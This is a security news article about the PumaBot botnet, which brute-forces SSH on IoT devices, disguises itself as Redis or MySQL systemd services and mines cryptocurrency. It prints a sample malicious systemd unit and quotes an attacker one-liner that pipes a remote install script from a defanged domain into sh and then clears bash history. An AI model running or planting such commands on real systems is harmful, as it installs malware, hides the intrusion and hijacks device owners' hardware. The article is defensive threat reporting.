New Linux PumaBot Targets IoT Devices Using SSH Brute-Force Attacks

A newly discovered Linux botnet, dubbed PumaBot, is actively targeting embedded Internet of Things (IoT) devices with remarkable stealth and technical sophistication.

Unlike traditional botnets that indiscriminately scan the internet, PumaBot executes targeted brute-force SSH attacks based on lists retrieved from its command-and-control (C2) infrastructure.

Its focus on persistence, evasion, and cryptocurrency mining marks an escalation in the evolving threat landscape facing IoT ecosystems.

Stealthy Infection Chain and Persistence Tactics

PumaBot’s infection begins with downloading a tailored set of target IP addresses from a remote C2 server.

The malware then attempts to brute-force SSH credentials on devices with open SSH ports, typically using a wordlist or sequence of default passwords.

Upon gaining access, it deploys itself to the device, camouflaging its presence by masquerading as legitimate system binaries often copying its binary to /lib/redis and naming it after familiar services.

To ensure it survives reboots and system cleanups, PumaBot abuses systemd service management. It creates deceptive service files such as redis.service or even mysqI.service (with a capital “I” designed to mimic the genuine MySQL service):

bash# Example of a malicious systemd service file
[Unit]
Description=Redis In-Memory Data Store

[Service]
ExecStart=/lib/redis
Restart=always

[Install]
WantedBy=multi-user.target

This service guarantees that the malicious binary is executed automatically when the system starts, enabling long-term access for the attacker.

Evasion, Surveillance Targeting, and Crypto Mining

A key technical highlight is PumaBot’s advanced fingerprinting and evasion techniques.

Before launching attacks, the malware probes devices for specific strings, such as “Pumatronix”—a known manufacturer of surveillance and traffic camera systems.

This allows PumaBot to either prioritize or avoid specific types of IoT hardware, indicating a tailored approach and an understanding of the IoT landscape.

Upon successful compromise, the botnet collects system information (uname -a is used to gather OS, kernel, and architecture details) and exfiltrates this data to its C2 server in a JSON-encoded payload using custom HTTP headers.

Information such as the device’s IP address, login credentials, and configurations is sent to the attacker, facilitating remote command execution and dynamic campaign management.

PumaBot is primarily monetized through cryptocurrency mining. Commands like xmrig are deployed, leveraging the device’s resources to mine cryptocurrencies illicitly.

Since these commands rarely reference full binary paths, additional payloads are likely fetched from attacker-controlled servers, further expanding the botnet’s capabilities.

Ecosystem of Related Tools

Darktrace analysts uncovered related binaries during their investigation, such as ddaemon (a Go-based backdoor that executes networkxm, another mining payload) and installx.sh, a shell script that automates payload delivery and erases forensic traces by clearing bash history:

bashwget http://1.lusyn[.]xyz/installx.sh -O- | sh
history -c

These components reveal a modular and extensible attack infrastructure, allowing threat actors to adjust and expand their operations rapidly.

PumaBot’s emergence marked by its Go-based architecture, strategic SSH brute-forcing, camouflaged persistence methods, and anti-analysis behavior represents a growing and sophisticated threat to IoT environments, particularly those with weak SSH credentials and limited monitoring.

Security teams are urged to harden SSH, monitor systemd modifications, and deploy IoT-specific defenses to reduce risk from this escalating botnet menace.